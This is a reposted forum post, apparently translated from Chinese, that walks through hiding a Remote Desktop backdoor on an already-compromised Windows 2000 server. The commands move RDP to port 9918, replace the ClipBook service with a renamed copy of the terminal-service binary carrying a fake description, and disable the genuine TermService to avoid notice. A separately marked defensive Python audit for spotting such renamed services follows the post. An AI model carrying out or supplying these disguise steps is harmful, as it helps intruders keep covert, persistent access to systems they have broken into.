Revision of back door experience

xiaoxiao2021-03-06  81


Author: dkollf, from: http://bbs.pysky.net

I don't know how you modify the service when you install your own backdoor. I remember someone saying that choosing a service name is something of an art: a very poor backdoor can survive because of its service name, and a very good backdoor can be taken down immediately because of a poor service name. Enough talk; let me use installing Terminal Services as an example to show the benefits of modifying the service.

We need a few tools here, so first an introduction:

3389.exe: needs no introduction, everyone on Earth knows it.
TPORT.exe: you should know this one too, but for the record, it modifies the 3389 port.
serv.exe: a service management program that can install, delete and modify services.
DTREG.EXE: a registry tool for use under CMD, much like regedit.

To start, suppose we already control the machine, a 2K Server on which the terminal service has not yet been opened, so let us open it:

    3389.exe 1    # Install the terminal, do not wear
    TPORT.EXE 9918    # Modify the port
    net stop clipsrv    # Delete the secondary service,
    serv.exe remove clipsrv /y    # in preparation for modifying the service
    Copy Termsrv.exe Clipsvr.exe    # Copy the file under a name matching the service to be replaced
    Serv.exe Install Clipsrv /B:"%windir%/system32/clipsvr.exe" /N:"Clipbook" /i:Yes /u:localsystem /S:Auto    # Install the service
    DTREG.EXE -QUIET -SET REG_SZ /HKLM/SYSTEM/CURRENTCONTROLSET/SERVICES/CLIPBOOK/Description=Support "Scrapbook Viewer" so that you can access the scrapbook from the remote scrapbook.    # Modify the registry
    serv modify TermService /s:Disabled    # Modify the status of the original terminal service

Now you will find that the terminal service is already open, on port 9918. Open the service manager and you will find that the terminal service has been disabled, and among the processes there is also a Termsrv.exe process, which is already very safe.
I have always done it this way. I don't know whether others do the same; everyone is welcome to exchange ideas, heh.
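A defender's view of the technique described above, as an added example that is not part of the original post: an audit of a service inventory for a binary running under another service's name, a copy of a disabled service's binary, and a non-default RDP listener port. The baseline table, the inventory records, the placeholder hash strings and the function names are all constructed assumptions; on a real host the port value would come from the RDP-Tcp PortNumber registry setting.

```python
import re

# Assumed known-good image per service for this build (hypothetical baseline).
BASELINE = {"clipsrv": "clipsrv.exe", "termservice": "termsrv.exe"}
DISABLED = 4  # registry Start value of a disabled service

# Constructed inventory: service name, ImagePath, Start value, placeholder hash.
SERVICES = [
    {"name": "ClipSrv", "image": r'"%windir%\system32\clipsvr.exe"',
     "start": 2, "sha256": "aa11"},
    {"name": "TermService", "image": r"%SystemRoot%\System32\termsrv.exe",
     "start": 4, "sha256": "aa11"},
    {"name": "Spooler", "image": r"%SystemRoot%\system32\spoolsv.exe",
     "start": 2, "sha256": "bb22"},
]
RDP_PORT = 9918  # constructed RDP-Tcp PortNumber value, matching the page


def image_name(path):
    """Lower-cased .exe file name from an ImagePath (quotes, args, either slash)."""
    m = re.search(r'[^\\/"]+?\.exe', path, re.I)
    return m.group(0).lower() if m else ""


def audit(services, baseline, rdp_port):
    findings = []
    by_name = {s["name"]: s for s in services}
    # Hashes of binaries that run under their expected service name.
    known = {s["sha256"]: s["name"] for s in services
             if baseline.get(s["name"].lower()) == image_name(s["image"])}
    for s in services:
        name, exe = s["name"], image_name(s["image"])
        expected = baseline.get(name.lower())
        if expected and exe != expected:
            findings.append((name, f"image {exe} differs from baseline {expected}"))
        owner = known.get(s["sha256"])
        if owner and owner != name:
            note = f"{exe} has the same hash as the {owner} binary"
            if by_name[owner]["start"] == DISABLED:
                note += f", and {owner} itself is disabled"
            findings.append((name, note))
    if rdp_port != 3389:
        findings.append(("RDP-Tcp", f"listener port {rdp_port} is not the default 3389"))
    return findings


if __name__ == "__main__":
    for subject, reason in audit(SERVICES, BASELINE, RDP_PORT):
        print(f"{subject}: {reason}")
```

The hash comparison is the check that survives a careful rename: a copied binary keeps its hash whatever file name, service name or description is placed around it.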

Please cite the original address when reposting: https://www.9cbs.com/read-95294.html
